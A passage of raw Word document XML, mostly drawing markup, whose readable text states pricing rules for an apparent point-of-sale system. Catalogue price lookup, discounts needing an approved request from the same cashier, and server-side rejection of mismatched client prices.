                  <v:path arrowok="t" textboxrect="0,0,38100,38100"/>
                </v:shape>
                <v:shape id="Shape 1061" o:spid="_x0000_s1028" style="position:absolute;top:200025;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rBwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/JasMw&#10;EL0X+g9iCr01shNIghslhEIhlwSyHXobrKml2hoZSYndv68Khd7m8dZZbUbXiTuFaD0rKCcFCOLa&#10;a8uNgsv5/WUJIiZkjZ1nUvBNETbrx4cVVtoPfKT7KTUih3CsUIFJqa+kjLUhh3Hie+LMffrgMGUY&#10;GqkDDjncdXJaFHPp0HJuMNjTm6G6Pd2cgkNpZduG2bYx0/3hyw7Hj+tiVOr5ady+gkg0pn/xn3un&#10;8/xiXsLvN/kEuf4BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAJ3EawcMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m19050,v2526,,4956,477,7290,1445c28674,2412,30734,3789,32520,5575v1787,1786,3163,3845,4130,6176c37617,14083,38100,16514,38100,19050v,2524,-483,4949,-1450,7286c35683,28662,34307,30727,32520,32513v-1786,1786,-3846,3162,-6180,4130c24006,37610,21576,38094,19050,38100v-2526,-6,-4956,-490,-7290,-1457c9426,35675,7366,34299,5580,32513,3793,30727,2417,28662,1450,26336,483,23999,,21574,,19050,,16514,483,14083,1450,11751,2417,9420,3793,7361,5580,5575,7366,3789,9426,2412,11760,1445,14094,477,16524,,19050,xe" fillcolor="#152235" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,38100,38100"/>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Services</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>services.price</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 looked up by the id encoded in the line's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SVC-&lt;id</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A410204" w14:textId="7AA33862" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:ind w:left="11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1168" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0B54B182" wp14:editId="4B2A6CCB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2894707</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19159</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="933450" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26048" name="Group 26048"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="933450" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="933450" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1066" name="Shape 1066"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="933450" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="933450" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="926555" y="0"/>
                                  <a:pt x="928800" y="930"/>
                                  <a:pt x="930660" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="932520" y="4645"/>
                                  <a:pt x="933450" y="6896"/>
                                  <a:pt x="933450" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="933450" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="933450" y="135979"/>
                                  <a:pt x="932520" y="138218"/>
                                  <a:pt x="930660" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="928800" y="141939"/>
                                  <a:pt x="926555" y="142869"/>
                                  <a:pt x="923925"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0B32A2A" id="Group 26048" o:spid="_x0000_s1026" style="position:absolute;margin-left:227.95pt;margin-top:-1.5pt;width:73.5pt;height:11.25pt;z-index:-251405312" coordsize="9334,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AjTTwMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N1otS0bsAG2WS9EG&#10;TfoBDEVZAiRRIOmtX9/hUKQtOwjaJAeH4ix882Yhr2/2XettmZAN75d+dBX6HuspL5t+vfR/P99/&#10;yX1PKtKXpOU9W/oHJv2b1edP17thwWJe87ZkwgMnvVzshqVfKzUsgkDSmnVEXvGB9SCsuOiIgk+x&#10;DkpBduC9a4M4DLNgx0U5CE6ZlLB7a4T+Cv1XFaPqZ1VJprx26QM2hb8Cf1/0b7C6Jou1IEPd0BEG&#10;eQeKjjQ9HOpc3RJFvI1oLlx1DRVc8kpdUd4FvKoayjAGiCYKz6J5EHwzYCzrxW49OJqA2jOe3u2W&#10;/tg+iOFpeBTAxG5YAxf4pWPZV6LT/wGlt0fKDo4ytlcehc0iSdIZEEtBFKVxPp8ZSmkNvF9Y0fru&#10;TbvAHhpMoOwGKA55jF9+LP6nmgwMaZULiP9ReE0J6MMs872edFClqOHhDtKCeo4kuZDA18cYcpGS&#10;Bd1I9cA4Uk2236UyNVnaFantiu57uxRQ2W/W9ECUttMo9dLbHXNVu1Rpace37JmjntIJK2bxzPds&#10;pgHnUaHtJ4pxUpypWgW6eWnoV/Znqp7NZieeAZc5L87zECoITiySsSFHSQIpMZJ4nqe6sADO1Pf0&#10;y9rFs9jYpVk6FqQVmXKFw7K8yEytXoiQgtdOs/FdWERJkkAbGBur9To2ByBKZsW8mEJwwKMkj6N8&#10;KnRsRGkYzlH4b3wcGY7SqEimZ8YuLbp/szOhS/GxuS/OtPGOrNj6mVhYndc4gUyYurgEkGZ6uOBs&#10;OQcezwsr+j82oMjQ4wXDdv88LXb/JMXTMGxwhgCjflJDVjw1OlW+rEXj5Lx8Xcz/1Q+OxLP+crxP&#10;u87mz5bzFDZtuWSmzvVcwZZ0swZL4zjN2l6PHQiFErjaq5YovCO7RsGd3zYdzKF4HkLz274Bb3rW&#10;m/GKK3VomZ5Nbf+LVTCn8R7SG1KsX761wtsSfbPjHzon7VCTcXf0O6oiVPSj7aumbZ3LCE0nLu9u&#10;7+N7HBAQ1Kis7Rg+KpxlaCzpiMa8LOB+hqDt+wLsnRGezHvl7Ht4FSHMk2j18oWXB7yTkRC4/JAa&#10;fAZgHOOTRb8zTr9R6/iwWv0FAAD//wMAUEsDBBQABgAIAAAAIQBvkgRz3wAAAAkBAAAPAAAAZHJz&#10;L2Rvd25yZXYueG1sTI/BasJAEIbvhb7DMoXedBNtpMZsRKTtSQrVQvE2ZsckmN0N2TWJb9/pqR5n&#10;5uOf78/Wo2lET52vnVUQTyMQZAuna1sq+D68T15B+IBWY+MsKbiRh3X++JBhqt1gv6jfh1JwiPUp&#10;KqhCaFMpfVGRQT91LVm+nV1nMPDYlVJ3OHC4aeQsihbSYG35Q4UtbSsqLvurUfAx4LCZx2/97nLe&#10;3o6H5PNnF5NSz0/jZgUi0Bj+YfjTZ3XI2enkrlZ70Sh4SZIlowomc+7EwCKa8eLE5DIBmWfyvkH+&#10;CwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29u&#10;dGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAA&#10;LwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALBQCNNPAwAAoAkAAA4AAAAAAAAAAAAAAAAA&#10;LgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAG+SBHPfAAAACQEAAA8AAAAAAAAAAAAA&#10;AAAAqQUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAC1BgAAAAA=&#10;">
                <v:shape id="Shape 1066" o:spid="_x0000_s1027" style="position:absolute;width:9334;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="933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5/xQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCL2UurGHoKmriGBbqKDVUuhtyE6zodnZJLtN0n/vCoK3ebzPWawGW4mOWl86VjCdJCCI&#10;c6dLLhR8nraPMxA+IGusHJOCf/KwWo7uFphp1/MHdcdQiBjCPkMFJoQ6k9Lnhiz6iauJI/fjWosh&#10;wraQusU+httKPiVJKi2WHBsM1rQxlP8e/6yCl/Vhzl/vpn/Yv3a707xpNt/cKHU/HtbPIAIN4Sa+&#10;ut90nJ+kKVy+iSfI5RkAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDtGL5/xQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l923925,v2630,,4875,930,6735,2784c932520,4645,933450,6896,933450,9525r,123825c933450,135979,932520,138218,930660,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135979,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,933450,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Discounts</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> require an </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>approved, unconsumed</w:t>
      </w:r>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DiscountRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> raised by the same cashier, capped at the approved amount.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF71C70"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client's submitted price is treated as advisory and a mismatch is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rejected</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a 422 naming the line, not silently corrected. Silent correction would let a cashier hand the customer a receipt showing one figure while the books recorded </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>another, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> would hide genuine drift between the till and the catalogue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150AA505"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2192" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="359C73CD" wp14:editId="4E1340F6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1437382</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19388</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1419225" cy="314325"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26050" name="Group 26050"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1419225" cy="314325"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1419225" cy="314325"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1077" name="Shape 1077"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="133350" y="0"/>
                            <a:ext cx="1285875" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1285875" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1278981" y="0"/>
                                  <a:pt x="1281225" y="924"/>
                                  <a:pt x="1283085" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1284945" y="4645"/>
                                  <a:pt x="1285875" y="6890"/>
                                  <a:pt x="1285875" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1285875" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1285875" y="135979"/>
                                  <a:pt x="1284945" y="138224"/>
                                  <a:pt x="1283085" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1281225" y="141945"/>
                                  <a:pt x="1278981" y="142875"/>
                                  <a:pt x="1276350" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>
                                  <a:pt x="930" y="4645"/>
                                  <a:pt x="2790" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="924"/>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81" name="Shape 1081"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="752475" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745580" y="0"/>
                                  <a:pt x="747825" y="930"/>
                                  <a:pt x="749685" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751545" y="4645"/>
                                  <a:pt x="752475" y="6896"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="135979"/>
                                  <a:pt x="751545" y="138218"/>
                                  <a:pt x="749685" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747825" y="141939"/>
                                  <a:pt x="745580" y="142869"/>
                                  <a:pt x="742950"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84" name="Shape 1084"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="819150" y="171450"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4645"/>
                                  <a:pt x="581024" y="6896"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581024" y="135979"/>
                                  <a:pt x="580095" y="138218"/>
                                  <a:pt x="578235" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="141939"/>
                                  <a:pt x="574130" y="142869"/>
                                  <a:pt x="571500"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5C49747" id="Group 26050" o:spid="_x0000_s1026" style="position:absolute;margin-left:113.2pt;margin-top:-1.55pt;width:111.75pt;height:24.75pt;z-index:-251404288" coordsize="14192,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&#10;">
                <v:shape id="Shape 1077" o:spid="_x0000_s1027" style="position:absolute;left:1333;width:12859;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="12858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97mxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/odlCr3pph6qRFdpBR8HPail0tuQnWRDs7Mhu42xv94VBG/z8T1ntuhsJVpqfOlYwdswAUGc&#10;OV1yoeDrtBpMQPiArLFyTAqu5GEx7/dmmGp34QO1x1CIGMI+RQUmhDqV0meGLPqhq4kjl7vGYoiw&#10;KaRu8BLDbSVHSfIuLZYcGwzWtDSU/R7/rII839n/6+d5s/7eBbP/2bRbu2qVen3pPqYgAnXhKX64&#10;tzrOT8ZjuH8TT5DzGwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQATy97mxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" 